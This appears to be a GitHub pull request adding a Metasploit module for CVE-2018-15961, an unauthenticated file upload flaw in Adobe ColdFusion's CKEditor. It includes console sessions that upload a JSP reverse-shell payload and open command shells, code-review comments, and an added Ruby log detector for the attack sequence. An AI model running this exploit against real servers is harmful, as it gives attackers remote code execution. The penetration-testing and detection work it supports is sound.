Coldfusion ckeditor file upload #11206

Merged
merged 6 commits into from Jan 10, 2019

Qazeer commented Jan 6, 2019

New pull request from a unique branch (coldfusion_ckeditor_file_upload) as requested.
Integrates RootUp's and bcoles' comments from the previous pull request.

--
Hello everyone,

This module exploits the unrestricted file upload flaw in the Adobe ColdFusion CKEditor, affecting ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release). The vulnerability goes by CVE-2018-15961.

The exploitation is pretty basic: a JSP payload is uploaded through a single unauthenticated POST request and executed through a following unauthenticated GET request.

This module was successfully tested against a Linux Adobe ColdFusion 2018 installation using the docker container provided by Adobe (https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0).

Output

msf > use exploit/multi/http/coldfusion_ckeditor_file_upload
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RPORT 8500
RPORT => 8500
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/LKDZNMPN.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:38568) at 2019-01-06 05:07:54 +0100

whoami
cfuser

Verification

msfconsole
use exploit/multi/http/coldfusion_ckeditor_file_upload
set srvhost
set RHOST
set RPORT
// If necessary
set payload
set LHOST
set LPORT
run

TODO

Should work on Windows and Adobe 2016 as the URL used does not change, but this is not tested.
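The upload-then-execute sequence described in the PR leaves a distinctive trace in the web server access log: a POST to the CKEditor filemanager upload handler followed shortly by a GET for a .jsp file under uploadedFiles from the same client. The Ruby script below is an added detection example, not part of this pull request or of the Metasploit module; the endpoint paths are taken from the module output above, the access-log lines are constructed for the example, and the 60-second correlation window and the .jspx extension are assumptions.

```ruby
require 'time'

# Paths as shown in the module output above (TARGETURI defaults to
# /cf_scripts/scripts/ajax/ckeditor): the upload handler and the directory
# it writes uploaded files to.
UPLOAD_HANDLER = '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm'.freeze
UPLOAD_DIR     = '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/'.freeze
# Server-side script types that should never be served from the upload directory.
# The module uploads .jsp; .jspx is added here as an assumption.
SCRIPT_EXTS     = %w[.jsp .jspx].freeze
SEQUENCE_WINDOW = 60 # seconds between upload and first execution (assumed threshold)

# Combined/common log format: client ident user [time] "METHOD PATH PROTO" status size
LOG_RE = /\A(?<client>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3})/

Entry = Struct.new(:client, :time, :method, :path, :status)

# Constructed sample log: one client performs the upload-then-execute sequence,
# another uploads a legitimate image through the same handler.
SAMPLE_LOG = <<~LOG
  172.17.0.1 - - [06/Jan/2019:05:07:50 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 200 512
  172.17.0.1 - - [06/Jan/2019:05:07:53 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 200 143
  172.17.0.1 - - [06/Jan/2019:05:07:54 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/LKDZNMPN.jsp HTTP/1.1" 200 0
  10.0.0.5 - - [06/Jan/2019:09:12:01 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 200 143
  10.0.0.5 - - [06/Jan/2019:09:12:02 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/photo.png HTTP/1.1" 200 20480
LOG

# Parse one access-log line; returns nil for lines that do not match the format.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  Entry.new(m[:client],
            Time.strptime(m[:time], '%d/%b/%Y:%H:%M:%S %z'),
            m[:method],
            m[:path].split('?').first, # drop any query string before matching
            m[:status].to_i)
end

# Walk the log in order and emit findings:
#   medium   - any POST to the upload handler (reachable unauthenticated on affected versions)
#   high     - a server-side script requested from the upload directory
#   critical - that request follows an upload by the same client within SEQUENCE_WINDOW
def detect(log_text)
  findings = []
  last_upload = {} # client => time of its most recent POST to the upload handler

  log_text.each_line.map { |l| parse_line(l) }.compact.each do |e|
    if e.method == 'POST' && e.path == UPLOAD_HANDLER
      last_upload[e.client] = e.time
      findings << { severity: :medium, client: e.client, time: e.time,
                    rule: 'POST to CKEditor filemanager upload handler' }
    elsif e.path.start_with?(UPLOAD_DIR) && SCRIPT_EXTS.include?(File.extname(e.path).downcase)
      findings << { severity: :high, client: e.client, time: e.time,
                    rule: "server-side script requested from uploadedFiles (#{File.basename(e.path)})" }
      if (t = last_upload[e.client]) && (e.time - t).between?(0, SEQUENCE_WINDOW)
        findings << { severity: :critical, client: e.client, time: e.time,
                      rule: 'upload followed by execution of the uploaded script' }
      end
    end
  end
  findings
end

if $PROGRAM_NAME == __FILE__
  detect(SAMPLE_LOG).each do |f|
    puts format('%-8s %-12s %s  %s', f[:severity], f[:client], f[:time].iso8601, f[:rule])
  end
end
```

On the sample log the script reports two medium findings (both uploads), one high finding for the .jsp request and one critical finding for the correlated sequence from 172.17.0.1, while the image upload from 10.0.0.5 only produces the medium entry. In practice the high and critical rules are the ones worth alerting on, since the upload directory should only ever serve the editor's image and document types.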

bcoles commented Jan 6, 2019

Please add some module documentation for this module.

'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => ['win', 'linux'],
'Targets' =>

bcoles Jan 6, 2019

The Java payload is platform agnostic, so you should be able to forgo having separate targets, and instead do this:

          [ 'Java Universal',
            {
                'Arch' => ARCH_JAVA,
                'Platform' => 'java'
            },
          ]

Take a look at grep -rn ".jsp" modules/exploits/multi/ | grep upload for a bunch of examples.

If you want to support multiple targets, take a look at struts_code_exec_exception_delegator or openfire_auth_bypass as examples which support the above universal target, plus a target for Windows and a target for Linux. They aren't JSP file upload exploits, but are similar in principle.

@jrobles-r7 jrobles-r7 self-assigned this Jan 9, 2019


res = send_request_cgi(
{
'uri' => normalize_uri(datastore['TARGETURI'], "plugins", "filemanager", "upload.cfm"),

acammack-r7 Jan 9, 2019

It looks like there are some leftover tabs in the alignment here. We prefer spaces since they are more reliable between different people's code editors.

jrobles-r7 added some commits Jan 10, 2019

@jrobles-r7 jrobles-r7 added docs and removed needs-docs labels Jan 10, 2019

jrobles-r7 commented Jan 10, 2019

@msjenkins-r7 test this please.

@jrobles-r7 jrobles-r7 merged commit 8ebbd9e into rapid7:master Jan 10, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request Jan 10, 2019

jrobles-r7 commented Jan 10, 2019

msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
rhosts => 172.22.222.142
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600

whoami
cfuser
uname -a
Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 172.22.222.142 - Command shell session 1 closed.
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) >

msjenkins-r7 added a commit that referenced this pull request Jan 10, 2019

jrobles-r7 commented Jan 10, 2019

Release Notes

The exploit/multi/http/coldfusion_ckeditor_file_upload module exploits an unauthenticated file upload vulnerability in the CKEditor of Adobe ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release) to upload and execute JSP files.
